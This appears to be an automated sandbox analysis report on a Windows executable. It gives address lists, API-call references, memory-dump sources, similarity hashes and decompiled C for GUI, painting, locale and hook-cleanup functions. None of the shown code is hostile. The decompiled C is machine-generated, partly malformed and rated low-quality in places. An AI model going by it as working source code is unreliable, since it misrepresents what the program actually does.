0x00439f89
0x00439fa3
0x00439fa6
0x00439fb9
0x00439fbc
0x00439fbe
0x00439fbf
0x00439fc1
0x00439fcc
0x00439fd5
0x00439fe7
0x00000000
0x00439fe9
0x0043a005
0x0043a00c
0x00000000
0x00000000
0x0043a00c
0x00000000
0x00000000
0x00000000
0x00000000
0x0043a00e
0x0043a00e
0x0043a00f
0x0043a00f
0x00439fc1
0x0043a012
0x0043a016
0x0043a01f
0x0043a01f
0x0043a02a
0x00439f8b
0x00439f92
0x00439f92
0x0043a036
0x0043a03d
0x0043a040
0x0043a043
0x0043a048
0x0043a04f
0x00000000
0x0043a05e
0x0043a063

APIs

BeginPaint.USER32(00000000,?), ref: 00439F6A
SaveDC.GDI32(?), ref: 00439F9E
ExcludeClipRect.GDI32(?,?,?,?,?,00000000,0043A064), ref: 0043A000
RestoreDC.GDI32(?,?), ref: 0043A02A
EndPaint.USER32(00000000,?,0043A06B), ref: 0043A05E

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Paint$BeginClipExcludeRectRestoreSave
String ID:
API String ID: 3808407030-0
Opcode ID: 677d3bc3ac6830141a07811bca55a8183d9f1ac058024a275b3252339247bd1a
Instruction ID: 71dcd1ce9a3b38b748253e530e8be96a5cbb13f9e5cabd90298693508bd235b0
Opcode Fuzzy Hash: 677d3bc3ac6830141a07811bca55a8183d9f1ac058024a275b3252339247bd1a
Instruction Fuzzy Hash: C4418070A00204AFDB14DF99C884F9EB7F9EF4C308F1590AAE544A7362DB799D54CB19

Uniqueness

Uniqueness Score: -1.00%

Function 0043D8C0, Relevance: 7.6, APIs: 5, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E0043D8C0(void* __eax) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr* _t14;
				intOrPtr* _t17;
				intOrPtr _t19;
				intOrPtr* _t21;
				intOrPtr* _t26;
				intOrPtr _t37;
				void* _t39;
				intOrPtr _t47;
				void* _t49;
				void* _t51;
				intOrPtr _t52;

				_t49 = _t51;
				_t52 = _t51 + 0xfffffff4;
				_t39 = __eax;
				if( *((short*)(__eax + 0x68)) == 0xffff) {
					return __eax;
				} else {
					_t14 =  *0x490fe4; // 0x492a9c
					_t17 =  *0x490fe4; // 0x492a9c
					_t19 =  *((intOrPtr*)( *_t17))(0xd,  *((intOrPtr*)( *_t14))(0xe, 1, 1, 1));
					_push(_t19);
					L00426A14();
					_v8 = _t19;
					_push(_t49);
					_push(0x43d980);
					_push( *[fs:eax]);
					 *[fs:eax] = _t52;
					_t21 =  *0x491278; // 0x492c08
					E00426A4C(_v8, E00453674( *_t21,  *((short*)(__eax + 0x68))));
					_t26 =  *0x491278; // 0x492c08
					E00426A4C(_v8, E00453674( *_t26,  *((short*)(_t39 + 0x68))));
					_push(0);
					_push(0);
					_push(0);
					_push(_v8);
					L00426A9C();
					_push( &_v16);
					_push(0);
					L00426AAC();
					_push(_v12);
					_push(_v16);
					_push(1);
					_push(_v8);
					L00426A9C();
					_pop(_t47);
					 *[fs:eax] = _t47;
					_push(0x43d987);
					_t37 = _v8;
					_push(_t37);
					L00426A1C();
					return _t37;
				}
			}

0x0043d8c1
0x0043d8c3
0x0043d8c7
0x0043d8ce
0x0043d98b
0x0043d8d4
0x0043d8dc
0x0043d8e8
0x0043d8ef
0x0043d8f1
0x0043d8f2
0x0043d8f7
0x0043d8fc
0x0043d8fd
0x0043d902
0x0043d905
0x0043d90c
0x0043d91d
0x0043d926
0x0043d937
0x0043d93c
0x0043d93e
0x0043d940
0x0043d945
0x0043d946
0x0043d94e
0x0043d94f
0x0043d951
0x0043d959
0x0043d95d
0x0043d95e
0x0043d963
0x0043d964
0x0043d96b
0x0043d96e
0x0043d971
0x0043d976
0x0043d979
0x0043d97a
0x0043d97f
0x0043d97f

APIs

73451AB0.COMCTL32(00000000), ref: 0043D8F2

Part of subcall function 00426A4C: 73452140.COMCTL32(00433C0E,000000FF,00000000,0043D922,00000000,0043D980,?,00000000), ref: 00426A50

73451680.COMCTL32(00433C0E,00000000,00000000,00000000,00000000,0043D980,?,00000000), ref: 0043D946
73451710.COMCTL32(00000000,?,00433C0E,00000000,00000000,00000000,00000000,0043D980,?,00000000), ref: 0043D951
73451680.COMCTL32(00433C0E,00000001,?,0043D9E9,00000000,?,00433C0E,00000000,00000000,00000000,00000000,0043D980,?,00000000), ref: 0043D964
73451F60.COMCTL32(00433C0E,0043D987,0043D9E9,00000000,?,00433C0E,00000000,00000000,00000000,00000000,0043D980,?,00000000), ref: 0043D97A

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: 7345173451680$7345171073452140
String ID:
API String ID: 821207058-0
Opcode ID: 7a2de65e10078dbb25f42b40a68a6e407dc82c236c6e759e206e8d345538ab80
Instruction ID: 8ea4806a52818ba835e40b660a0f20c3d7c71dc04e647954a84ca1ed1576d89d
Opcode Fuzzy Hash: 7a2de65e10078dbb25f42b40a68a6e407dc82c236c6e759e206e8d345538ab80
Instruction Fuzzy Hash: F4215474700214EFDB10EBA9DC82F5973F8EB49704F5141A6F904EB2A1D675AE40CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00424C08, Relevance: 7.6, APIs: 5, Instructions: 66
windowCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E00424C08(struct HPALETTE__* __eax) {
				struct HPALETTE__* _t21;
				char _t28;
				signed int _t30;
				struct HPALETTE__* _t36;
				struct HPALETTE__* _t37;
				struct HDC__* _t38;
				intOrPtr _t39;

				_t21 = __eax;
				_t36 = __eax;
				_t39 =  *((intOrPtr*)(__eax + 0x28));
				if( *((char*)(__eax + 0x30)) == 0 &&  *(_t39 + 0x10) == 0 &&  *((intOrPtr*)(_t39 + 0x14)) != 0) {
					_t22 =  *((intOrPtr*)(_t39 + 0x14));
					if( *((intOrPtr*)(_t39 + 0x14)) ==  *((intOrPtr*)(_t39 + 8))) {
						E00423588(_t22);
					}
					_t21 = E004211EC( *((intOrPtr*)(_t39 + 0x14)), 1 <<  *(_t39 + 0x3e));
					_t37 = _t21;
					 *(_t39 + 0x10) = _t37;
					if(_t37 == 0) {
						_push(0);
						L00406EA4();
						_t21 = E00420AFC(_t21);
						_t38 = _t21;
						if( *((char*)(_t39 + 0x71)) != 0) {
							L9:
							_t28 = 1;
						} else {
							_push(0xc);
							_push(_t38);
							L00406B8C();
							_push(0xe);
							_push(_t38);
							L00406B8C();
							_t30 = _t21 * _t21;
							_t21 = ( *(_t39 + 0x2a) & 0x0000ffff) * ( *(_t39 + 0x28) & 0x0000ffff);
							if(_t30 < _t21) {
								goto L9;
							} else {
								_t28 = 0;
							}
						}
						 *((char*)(_t39 + 0x71)) = _t28;
						if(_t28 != 0) {
							_t21 = CreateHalftonePalette(_t38);
							 *(_t39 + 0x10) = _t21;
						}
						_push(_t38);
						_push(0);
						L00407114();
						if( *(_t39 + 0x10) == 0) {
							 *((char*)(_t36 + 0x30)) = 1;
							return _t21;
						}
					}
				}
				return _t21;
			}

0x00424c08
0x00424c0c
0x00424c0e
0x00424c15
0x00424c2f
0x00424c35
0x00424c37
0x00424c37
0x00424c4e
0x00424c53
0x00424c55
0x00424c5a
0x00424c5c
0x00424c5e
0x00424c63
0x00424c68
0x00424c6e
0x00424c97
0x00424c97
0x00424c70
0x00424c70
0x00424c72
0x00424c73
0x00424c7a
0x00424c7c
0x00424c7d
0x00424c82
0x00424c8d
0x00424c91
0x00000000
0x00424c93
0x00424c93
0x00424c93
0x00424c91
0x00424c99
0x00424c9e
0x00424ca1
0x00424ca6
0x00424ca6
0x00424ca9
0x00424caa
0x00424cac
0x00424cb5
0x00424cb7
0x00000000
0x00424cb7
0x00424cb5
0x00424c5a
0x00424cbf

APIs

72E7AC50.USER32(00000000,?,?,?,?,0042375F,00000000,004237EB), ref: 00424C5E
72E7AD70.GDI32(00000000,0000000C,00000000,?,?,?,?,0042375F,00000000,004237EB), ref: 00424C73
72E7AD70.GDI32(00000000,0000000E,00000000,0000000C,00000000,?,?,?,?,0042375F,00000000,004237EB), ref: 00424C7D
CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,0042375F,00000000,004237EB), ref: 00424CA1
72E7B380.USER32(00000000,00000000,00000000,?,?,?,?,0042375F,00000000,004237EB), ref: 00424CAC

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: B380CreateHalftonePalette
String ID:
API String ID: 178651289-0
Opcode ID: d4018df0410e552c160e27d517ea2bbddef88c18dbff2cb0cbe3ca7ce4171e75
Instruction ID: 3c3e503f7964a019047a84334c958d4ec1a2b305e00e0b2a989410755a2eba74
Opcode Fuzzy Hash: d4018df0410e552c160e27d517ea2bbddef88c18dbff2cb0cbe3ca7ce4171e75
Instruction Fuzzy Hash: 2911A531702279AADB20DF6AE4417EA3AD0EB51355F410126FC049A6C1D7BC9890C3AD

Uniqueness

Uniqueness Score: -1.00%

Function 00452940, Relevance: 7.6, APIs: 5, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E00452940(void* __eax) {
				void* _t16;
				void* _t37;
				void* _t38;
				signed int _t41;

				_t16 = __eax;
				_t38 = __eax;
				if(( *(__eax + 0x1c) & 0x00000010) == 0 &&  *0x476b50 != 0) {
					_t16 = E0043C4F8(__eax);
					if(_t16 != 0) {
						_t41 = GetWindowLongA(E0043C1F4(_t38), 0xffffffec);
						if( *((char*)(_t38 + 0x2e0)) != 0 ||  *((char*)(_t38 + 0x2e2)) != 0) {
							if((_t41 & 0x00080000) == 0) {
								SetWindowLongA(E0043C1F4(_t38), 0xffffffec, _t41 | 0x00080000);
							}
							return  *0x476b50(E0043C1F4(_t38),  *((intOrPtr*)(_t38 + 0x2e4)),  *((intOrPtr*)(_t38 + 0x2e1)),  *0x00476BD4 |  *0x00476BDC);
						} else {
							SetWindowLongA(E0043C1F4(_t38), 0xffffffec, _t41 & 0xfff7ffff);
							_push(0x485);
							_push(0);
							_push(0);
							_t37 = E0043C1F4(_t38);
							_push(_t37);
							L004070EC();
							return _t37;
						}
					}
				}
				return _t16;
			}

0x00452940
0x00452942
0x00452948
0x0045295d
0x00452964
0x00452979
0x00452982
0x00452993
0x004529a6
0x004529a6
0x00000000
0x004529e8
0x004529f9
0x004529fe
0x00452a03
0x00452a05
0x00452a09
0x00452a0e
0x00452a0f
0x00000000
0x00452a0f
0x00452982
0x00452964
0x00452a16

APIs

GetWindowLongA.USER32 ref: 00452974
SetWindowLongA.USER32 ref: 004529A6
SetLayeredWindowAttributes.USER32(00000000,?,?,00000000,00000000,000000EC,?,?,004505AC), ref: 004529E0
SetWindowLongA.USER32 ref: 004529F9
72E7B330.USER32(00000000,00000000,00000000,00000485,00000000,000000EC,00000000,00000000,000000EC,?,?,004505AC), ref: 00452A0F

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Long$AttributesB330Layered
String ID:
API String ID: 1770052509-0
Opcode ID: 087e273c3aca4a6a58b0e38cb7cb75d1632ce92489a7994197e4ca98f679ba6e
Instruction ID: 7ae8c400807931af7430558d2d8102ea1d42c1aca7f9b541f5a91e1d8d5fe38c
Opcode Fuzzy Hash: 087e273c3aca4a6a58b0e38cb7cb75d1632ce92489a7994197e4ca98f679ba6e
Instruction Fuzzy Hash: 361158A0A0469116DB10AE799C89B97164C1B07319F14157BBC55FF2D3CB6C9848D77C

Uniqueness

Uniqueness Score: -1.00%

Function 0041D2B8, Relevance: 7.6, APIs: 5, Instructions: 60
registryCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E0041D2B8(intOrPtr _a4, short _a6, intOrPtr _a8) {
				struct _WNDCLASSA _v44;
				struct HINSTANCE__* _t6;
				CHAR* _t8;
				struct HINSTANCE__* _t9;
				int _t10;
				void* _t11;
				struct HINSTANCE__* _t13;
				CHAR* _t14;
				struct HINSTANCE__* _t19;
				CHAR* _t20;
				struct HWND__* _t22;

				_t6 =  *0x492714; // 0x400000
				 *0x4764d0 = _t6;
				_t8 =  *0x4764e4; // 0x41d2a8
				_t9 =  *0x492714; // 0x400000
				_t10 = GetClassInfoA(_t9, _t8,  &_v44);
				asm("sbb eax, eax");
				_t11 = _t10 + 1;
				if(_t11 == 0 || L00406D8C != _v44.lpfnWndProc) {
					if(_t11 != 0) {
						_t19 =  *0x492714; // 0x400000
						_t20 =  *0x4764e4; // 0x41d2a8
						UnregisterClassA(_t20, _t19);
					}
					RegisterClassA(0x4764c0);
				}
				_t13 =  *0x492714; // 0x400000
				_t14 =  *0x4764e4; // 0x41d2a8
				_t22 = CreateWindowExA(0x80, _t14, 0x41d368, 0x80000000, 0, 0, 0, 0, 0, 0, _t13, 0);
				if(_a6 != 0) {
					SetWindowLongA(_t22, 0xfffffffc, E0041D1FC(_a4, _a8));
				}
				return _t22;
			}

0x0041d2bf
0x0041d2c4
0x0041d2cd
0x0041d2d3
0x0041d2d9
0x0041d2e1
0x0041d2e3
0x0041d2e6
0x0041d2f4
0x0041d2f6
0x0041d2fc
0x0041d302
0x0041d302
0x0041d30c
0x0041d30c
0x0041d313
0x0041d32f
0x0041d33f
0x0041d346
0x0041d357
0x0041d357
0x0041d362

APIs

GetClassInfoA.USER32 ref: 0041D2D9
UnregisterClassA.USER32 ref: 0041D302
RegisterClassA.USER32 ref: 0041D30C
CreateWindowExA.USER32 ref: 0041D33A
SetWindowLongA.USER32 ref: 0041D357

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Class$Window$CreateInfoLongRegisterUnregister
String ID:
API String ID: 3404767174-0
Opcode ID: 241767791042952b3840cb5b633aa9e02eb2e9207c04c2aadd6e01d35702f1e5
Instruction ID: 0b43b3726ff93901adb79ee408722d0e4703594a24f2b397aff69cbb08d7ac49
Opcode Fuzzy Hash: 241767791042952b3840cb5b633aa9e02eb2e9207c04c2aadd6e01d35702f1e5
Instruction Fuzzy Hash: 7F0188B1A001047BCA10EBA8DD81F9A33ADEB09308F104277F918F72D2D775E948876E

Uniqueness

Uniqueness Score: -1.00%

Function 00421154, Relevance: 7.6, APIs: 5, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 40%

			E00421154(intOrPtr __eax) {
				char _v5;
				intOrPtr _v12;
				intOrPtr _t14;
				intOrPtr _t16;
				intOrPtr _t18;
				intOrPtr _t21;
				intOrPtr _t30;
				void* _t32;
				void* _t34;
				intOrPtr _t35;

				_t32 = _t34;
				_t35 = _t34 + 0xfffffff8;
				_v5 = 0;
				if( *0x492a28 == 0) {
					return _v5;
				} else {
					_push(0);
					L00406EA4();
					_v12 = __eax;
					_push(_t32);
					_push(0x4211da);
					_push( *[fs:edx]);
					 *[fs:edx] = _t35;
					_push(0x68);
					_t14 = _v12;
					_push(_t14);
					L00406B8C();
					if(_t14 >= 0x10) {
						_push(__eax + 4);
						_push(8);
						_push(0);
						_t18 =  *0x492a28; // 0xc20806be
						_push(_t18);
						L00406BB4();
						_push(__eax + ( *(__eax + 2) & 0x0000ffff) * 4 - 0x1c);
						_push(8);
						_push(8);
						_t21 =  *0x492a28; // 0xc20806be
						_push(_t21);
						L00406BB4();
						_v5 = 1;
					}
					_pop(_t30);
					 *[fs:eax] = _t30;
					_push(0x4211e1);
					_t16 = _v12;
					_push(_t16);
					_push(0);
					L00407114();
					return _t16;
				}
			}

0x00421155
0x00421157
0x0042115d
0x00421168
0x004211e8
0x0042116a
0x0042116a
0x0042116c
0x00421171
0x00421176
0x00421177
0x0042117c
0x0042117f
0x00421182
0x00421184
0x00421187
0x00421188
0x00421190
0x00421195
0x00421196
0x00421198
0x0042119a
0x0042119f
0x004211a0
0x004211ad
0x004211ae
0x004211b0
0x004211b2
0x004211b7
0x004211b8
0x004211bd
0x004211bd
0x004211c3
0x004211c6
0x004211c9
0x004211ce
0x004211d1
0x004211d2
0x004211d4
0x004211d9
0x004211d9

APIs

72E7AC50.USER32(00000000), ref: 0042116C
72E7AD70.GDI32(?,00000068,00000000,004211DA,?,00000000), ref: 00421188
72E7AEA0.GDI32(C20806BE,00000000,00000008,?,?,00000068,00000000,004211DA,?,00000000), ref: 004211A0
72E7AEA0.GDI32(C20806BE,00000008,00000008,?,C20806BE,00000000,00000008,?,?,00000068,00000000,004211DA,?,00000000), ref: 004211B8
72E7B380.USER32(00000000,?,004211E1,004211DA,?,00000000), ref: 004211D4

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: B380
String ID:
API String ID: 120756276-0
Opcode ID: 260c98c995fdc23318bed2531b7113e69772b3d183c6f94793780469d0ee4c5f
Instruction ID: 4124ae89fc3ff9af0de6bfb709674fa9922fe0bc218d5222fbff8a0036b8e124
Opcode Fuzzy Hash: 260c98c995fdc23318bed2531b7113e69772b3d183c6f94793780469d0ee4c5f
Instruction Fuzzy Hash: 8C114871748340BEEB00CBE59C82F697BE8E718724F5040A7F604DA2C1CABAA414C328

Uniqueness

Uniqueness Score: -1.00%

Function 00461F8C, Relevance: 7.6, APIs: 5, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E00461F8C(int __eax) {
				int _v8;
				int _t20;
				int _t22;
				intOrPtr _t29;
				int _t32;
				intOrPtr _t34;
				intOrPtr _t36;

				_t34 = _t36;
				_t22 = __eax;
				if( *((char*)(__eax + 0x2e8)) == 1) {
					return __eax;
				} else {
					_push(0);
					L00406EA4();
					_v8 = __eax;
					_push(_t34);
					_push(0x462011);
					_push( *[fs:eax]);
					 *[fs:eax] = _t36;
					_push(0x48);
					_t11 = _v8;
					L00406B8C();
					_t32 = MulDiv(E0041F684( *((intOrPtr*)(__eax + 0x68))), _v8, _t11);
					 *(_t22 + 0x2b0) = _t32;
					E0045F988(_t22, MulDiv(_t32, 0x78, 0x64));
					 *((intOrPtr*)(_t22 + 0x2e4)) =  *((intOrPtr*)(_t22 + 0x234));
					_t29 = 0x5a;
					 *[fs:eax] = _t29;
					_push(0x462018);
					_t20 = _v8;
					_push(_t20);
					_push(0);
					L00407114();
					return _t20;
				}
			}

0x00461f8d
0x00461f92
0x00461f9b
0x0046201c
0x00461f9d
0x00461f9d
0x00461f9f
0x00461fa4
0x00461fa9
0x00461faa
0x00461faf
0x00461fb2
0x00461fb5
0x00461fb9
0x00461fbd
0x00461fd1
0x00461fd3
0x00461fe7
0x00461ff2
0x00461ffa
0x00461ffd
0x00462000
0x00462005
0x00462008
0x00462009
0x0046200b
0x00462010
0x00462010

APIs

72E7AC50.USER32(00000000), ref: 00461F9F
72E7AD70.GDI32(?,0000005A,00000048,00000000,00462011,?,00000000), ref: 00461FBD

Part of subcall function 0041F684: MulDiv.KERNEL32(00000000,00000048,?), ref: 0041F695

MulDiv.KERNEL32(00000000,00000000,?), ref: 00461FCC
MulDiv.KERNEL32(00000000,00000078,00000064), ref: 00461FDE
72E7B380.USER32(00000000,?,00462018,00000000,00000000,?,0000005A,00000048,00000000,00462011,?,00000000), ref: 0046200B

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: B380
String ID:
API String ID: 120756276-0
Opcode ID: efaf82620a21a9afdda7de621e26233fa48b3437332e6790b93935ef920589f7
Instruction ID: ce152b9841b61194860a01a7d141dbec5ac039d8fc94144150a278fa3c5b6213
Opcode Fuzzy Hash: efaf82620a21a9afdda7de621e26233fa48b3437332e6790b93935ef920589f7
Instruction Fuzzy Hash: E301C0716847407EEB00EFA58C46B5A7698DB09714F1100BAFA08AB282D6B95C00C768

Uniqueness

Uniqueness Score: -1.00%

Function 00409C38, Relevance: 7.6, APIs: 5, Instructions: 50
threadCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E00409C38(void* __esi, void* __eflags) {
				char _v8;
				intOrPtr* _t18;
				intOrPtr _t26;
				void* _t27;
				long _t29;
				intOrPtr _t32;
				void* _t33;

				_t33 = __eflags;
				_push(0);
				_push(_t32);
				_push(0x409ccf);
				_push( *[fs:eax]);
				 *[fs:eax] = _t32;
				E004099B0(GetThreadLocale(), 0x409ce4, 0x100b,  &_v8);
				_t29 = E0040879C(0x409ce4, 1, _t33);
				if(_t29 + 0xfffffffd - 3 < 0) {
					EnumCalendarInfoA(E00409B84, GetThreadLocale(), _t29, 4);
					_t27 = 7;
					_t18 = 0x49281c;
					do {
						 *_t18 = 0xffffffff;
						_t18 = _t18 + 4;
						_t27 = _t27 - 1;
					} while (_t27 != 0);
					EnumCalendarInfoA(E00409BC0, GetThreadLocale(), _t29, 3);
				}
				_pop(_t26);
				 *[fs:eax] = _t26;
				_push(E00409CD6);
				return E00404348( &_v8);
			}

0x00409c38
0x00409c3b
0x00409c40
0x00409c41
0x00409c46
0x00409c49
0x00409c5f
0x00409c71
0x00409c7b
0x00409c8b
0x00409c90
0x00409c95
0x00409c9a
0x00409c9a
0x00409ca0
0x00409ca3
0x00409ca3
0x00409cb4
0x00409cb4
0x00409cbb
0x00409cbe
0x00409cc1
0x00409cce

APIs

GetThreadLocale.KERNEL32(?,00000000,00409CCF,?,?,00000000), ref: 00409C50

Part of subcall function 004099B0: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 004099CE

GetThreadLocale.KERNEL32(00000000,00000004,00000000,00409CCF,?,?,00000000), ref: 00409C80
EnumCalendarInfoA.KERNEL32(Function_00009B84,00000000,00000000,00000004), ref: 00409C8B
GetThreadLocale.KERNEL32(00000000,00000003,00000000,00409CCF,?,?,00000000), ref: 00409CA9
EnumCalendarInfoA.KERNEL32(Function_00009BC0,00000000,00000000,00000003), ref: 00409CB4

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Locale$InfoThread$CalendarEnum
String ID:
API String ID: 4102113445-0
Opcode ID: 316503a768b29b2598b76e2056b121bc60b75b7765209c54ef7d6335e79560c6
Instruction ID: 45d655dda3edaeb237038c5d9ca3a385cb1ac1a88f938bcd0c00c12fcdd897c3
Opcode Fuzzy Hash: 316503a768b29b2598b76e2056b121bc60b75b7765209c54ef7d6335e79560c6
Instruction Fuzzy Hash: 8A01D4B56042056AE701B7618D13B5A719CEB85B28F22413BF901B66C6D67C9E0081AC

Uniqueness

Uniqueness Score: -1.00%

Function 00453F40, Relevance: 7.5, APIs: 5, Instructions: 25
synchronizationthreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00453F40() {
				void* _t2;
				void* _t5;
				void* _t8;
				struct HHOOK__* _t10;

				if( *0x492c1c != 0) {
					_t10 =  *0x492c1c; // 0x0
					UnhookWindowsHookEx(_t10);
				}
				 *0x492c1c = 0;
				if( *0x492c20 != 0) {
					_t2 =  *0x492c18; // 0x0
					SetEvent(_t2);
					if(GetCurrentThreadId() !=  *0x492c14) {
						_t8 =  *0x492c20; // 0x0
						WaitForSingleObject(_t8, 0xffffffff);
					}
					_t5 =  *0x492c20; // 0x0
					CloseHandle(_t5);
					 *0x492c20 = 0;
					return 0;
				}
				return 0;
			}

0x00453f47
0x00453f49
0x00453f4f
0x00453f4f
0x00453f56
0x00453f62
0x00453f64
0x00453f6a
0x00453f7a
0x00453f7e
0x00453f84
0x00453f84
0x00453f89
0x00453f8f
0x00453f96
0x00000000
0x00453f96
0x00453f9b

APIs

UnhookWindowsHookEx.USER32(00000000), ref: 00453F4F
SetEvent.KERNEL32(00000000,004561EA,00000000,004552C7,?,?,dZG,00000001,00455387,?,?,?,dZG), ref: 00453F6A
GetCurrentThreadId.KERNEL32 ref: 00453F6F
WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,004561EA,00000000,004552C7,?,?,dZG,00000001,00455387,?,?,?,dZG), ref: 00453F84
CloseHandle.KERNEL32(00000000,00000000,004561EA,00000000,004552C7,?,?,dZG,00000001,00455387,?,?,?,dZG), ref: 00453F8F

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseCurrentEventHandleHookObjectSingleThreadUnhookWaitWindows
String ID:
API String ID: 2429646606-0
Opcode ID: e1f3ffdced574a68e03de45e4cc2b7672e9f46ba86cacc15a492fac6642ab509
Instruction ID: 8f998089f3f5830ceb25d3d6760d809e37c77c1beacc2c4a2821b6e1f50ac112
Opcode Fuzzy Hash: e1f3ffdced574a68e03de45e4cc2b7672e9f46ba86cacc15a492fac6642ab509
Instruction Fuzzy Hash: 39F09872A01100AAC711EB79DE8AE1A32E4A72831AB05497BB115E31A2CFB8D595CB5D

Uniqueness

Uniqueness Score: -1.00%

Function 004563B8, Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 289
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E004563B8(char __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				int _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				struct tagPOINT _v32;
				char _v33;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v48;
				struct HWND__* _v52;
				intOrPtr _v56;
				char _v60;
				struct tagRECT _v76;
				intOrPtr _v80;
